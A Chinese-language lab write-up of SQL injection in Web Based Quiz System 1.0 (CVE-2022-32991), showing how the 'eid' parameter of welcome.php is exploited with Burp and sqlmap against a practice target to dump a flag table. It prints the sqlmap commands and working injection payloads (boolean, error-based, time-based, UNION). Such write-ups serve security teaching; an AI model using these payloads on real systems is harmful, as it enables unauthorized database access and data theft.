【靶场】WP+漏洞分析 | Web Based Quiz System SQL注入(CVE-2022-32991)

admin
admin
admin
102421
文章
87
评论
2023年9月7日17:30:40评论16 views字数 4139阅读13分47秒阅读模式
欢迎关注公众号,更多内容喔~

介绍

在Web Based Quiz System 1.0 中曾发现分类为致命的漏洞。此漏洞会影响某些未知进程文件welcome.php。手动调试的软件参数:eid不合法输入可导致 SQL注入。漏洞的CWE定义是 CWE-89。此漏洞的脆弱性 2022-06-15所披露。阅读公告的网址是yuque.com。

该漏洞被标识为CVE-2022-32991, CVE分配信息格式:2022-06-13。攻击可能远程发起, 有技术细节可用。该漏洞的知名度低于平均水平, 没有可利用漏洞。当前漏洞利用的价值为美元大约是$0-$5k 。根据MITRE ATT&CK,此问题部署的攻击技术是T1505。

后有源码下载地址

靶场环境‍‍

使用春秋云境平台,主页→漏洞靶标→免费空间→CVE-2022-32991

工具:

  • Burpsuite

  • Sqlmap

  • 浏览器


渗透测试

1、已知信息

该系统在welcome.php 存在sql注入漏洞

2、系统页面

访问靶场链接,首页需要登陆

【靶场】WP+漏洞分析 | Web Based Quiz System SQL注入(CVE-2022-32991)

3.注册系统

【靶场】WP+漏洞分析 | Web Based Quiz System SQL注入(CVE-2022-32991)

按照要求进行注册,注册后即可登录系统

4.登陆系统

登陆后跳转到如下url:

http://eci-2ze7j3wqd7sbo75y7fg4.cloudeci1.ichunqiu.com/welcome.php?q=1>

页面如下所示

【靶场】WP+漏洞分析 | Web Based Quiz System SQL注入(CVE-2022-32991)

5.尝试注入

登陆后进入到页面welcpm.php 同时参数为q,尝试进行注入,但是发现该参数并不存在注入

【靶场】WP+漏洞分析 | Web Based Quiz System SQL注入(CVE-2022-32991)

根据cve漏洞信息,可以知道造成注入的参数为eid,于是尝试寻找注入点。

在上图的页面,点击start按钮跳转新页面如下

【靶场】WP+漏洞分析 | Web Based Quiz System SQL注入(CVE-2022-32991)

地址为:

http://eci-2ze7j3wqd7sbo75y7fg4.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141f1e8399e&n=1&t=10

【靶场】WP+漏洞分析 | Web Based Quiz System SQL注入(CVE-2022-32991)

即位存在sql注入的地方

6.通过burp抓包保存

因为访问welcome.php页面会校验登陆,所以注入时要带着cookie,于是通过burp抓包。

【靶场】WP+漏洞分析 | Web Based Quiz System SQL注入(CVE-2022-32991)

浏览器代理到burp,找到该url的包,然后右键保存到文件,方便通过sqlmap跑注入。

【靶场】WP+漏洞分析 | Web Based Quiz System SQL注入(CVE-2022-32991)

7.sqlmap进行注入

注入获取数据库

sqlmap -r 1.txt --dbs

【靶场】WP+漏洞分析 | Web Based Quiz System SQL注入(CVE-2022-32991)

payload为:

Parameter: eid (GET)Type: boolean-based blindTitle: AND boolean-based blind - WHERE or HAVING clausePayload: q=quiz&step=2&eid=5b141f1e8399e' AND 7643=7643 AND 'RWYY'='RWYY&n=1&t=10
Type: error-basedTitle: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)Payload: q=quiz&step=2&eid=5b141f1e8399e' OR (SELECT 7695 FROM(SELECT COUNT(*),CONCAT(0x717a6b7a71,(SELECT (ELT(7695=7695,1))),0x7170707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'uLzc'='uLzc&n=1&t=10
Type: time-based blindTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP)Payload: q=quiz&step=2&eid=5b141f1e8399e' AND (SELECT 4331 FROM (SELECT(SLEEP(5)))PRxs) AND 'kzHJ'='kzHJ&n=1&t=10
Type: UNION queryTitle: Generic UNION query (NULL) - 5 columnsPayload: q=quiz&step=2&eid=5b141f1e8399e' UNION ALL SELECT NULL,NULL,CONCAT(0x717a6b7a71,0x4362467a7358484b78694e774b646943474e6d6c7a626e625273456e676444476778796f4262466d,0x7170707171),NULL,NULL-- -&n=1&t=10

获得数据库信息,再注入查询ctf数据库中的表信息

sqlmap -r 1.txt --tables -D ctf

payload为:

Parameter: eid (GET)Type: boolean-based blindTitle: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)Payload: q=quiz&step=2&eid=-9834' OR 1094=1094#&n=1&t=34
Type: error-basedTitle: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)Payload: q=quiz&step=2&eid=60377db362694' OR (SELECT 8050 FROM(SELECT COUNT(*),CONCAT(0x717a6a7a71,(SELECT (ELT(8050=8050,1))),0x716b627a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- CMZh&n=1&t=34
Type: time-based blindTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP)Payload: q=quiz&step=2&eid=60377db362694' AND (SELECT 3662 FROM (SELECT(SLEEP(5)))aGCQ)-- WCoo&n=1&t=34

【靶场】WP+漏洞分析 | Web Based Quiz System SQL注入(CVE-2022-32991)

查询列信息

sqlmap -r 1.txt --columns -T flag -D ctf

Parameter: eid (GET)    Type: boolean-based blind    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)    Payload: q=quiz&step=2&eid=-9834' OR 1094=1094#&n=1&t=34
    Type: error-based    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)    Payload: q=quiz&step=2&eid=60377db362694' OR (SELECT 8050 FROM(SELECT COUNT(*),CONCAT(0x717a6a7a71,(SELECT (ELT(8050=8050,1))),0x716b627a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- CMZh&n=1&t=34
    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: q=quiz&step=2&eid=60377db362694' AND (SELECT 3662 FROM (SELECT(SLEEP(5)))aGCQ)-- WCoo&n=1&t=34

【靶场】WP+漏洞分析 | Web Based Quiz System SQL注入(CVE-2022-32991)

最后查询数据

sqlmap -r 1.txt --dump -C flag -T flag -D ctf

payload:

Parameter: eid (GET)    Type: boolean-based blind    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)    Payload: q=quiz&step=2&eid=-9834' OR 1094=1094#&n=1&t=34
    Type: error-based    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)    Payload: q=quiz&step=2&eid=60377db362694' OR (SELECT 8050 FROM(SELECT COUNT(*),CONCAT(0x717a6a7a71,(SELECT (ELT(8050=8050,1))),0x716b627a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- CMZh&n=1&t=34
    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: q=quiz&step=2&eid=60377db362694' AND (SELECT 3662 FROM (SELECT(SLEEP(5)))aGCQ)-- WCoo&n=1&t=34

【靶场】WP+漏洞分析 | Web Based Quiz System SQL注入(CVE-2022-32991)

代码分析

源码文件:(请关注公众号,后续更多分享~)

https://drive.google.com/file/d/1Tv_Se21Vni5E3CL0Rv8Usm2g9nKX8SU7/view?usp=drive_link

根据注入点页面的参数

GET /welcome.php?q=quiz&step=2&eid=60377db362694&n=1&t=34 HTTP/1.1

定位到welcome.php 91行开始的代码,存在sql语句拼接,造成的sql注入,如下图

【靶场】WP+漏洞分析 | Web Based Quiz System SQL注入(CVE-2022-32991)

来玩

欢迎进群吹水交流~~~

【靶场】WP+漏洞分析 | Web Based Quiz System SQL注入(CVE-2022-32991)



原文始发于微信公众号(赛博之眼CyberEye):【靶场】WP+漏洞分析 | Web Based Quiz System SQL注入(CVE-2022-32991)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年9月7日17:30:40
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【靶场】WP+漏洞分析 | Web Based Quiz System SQL注入(CVE-2022-32991)http://cn-sec.com/archives/2014190.html

发表评论

匿名网友 填写信息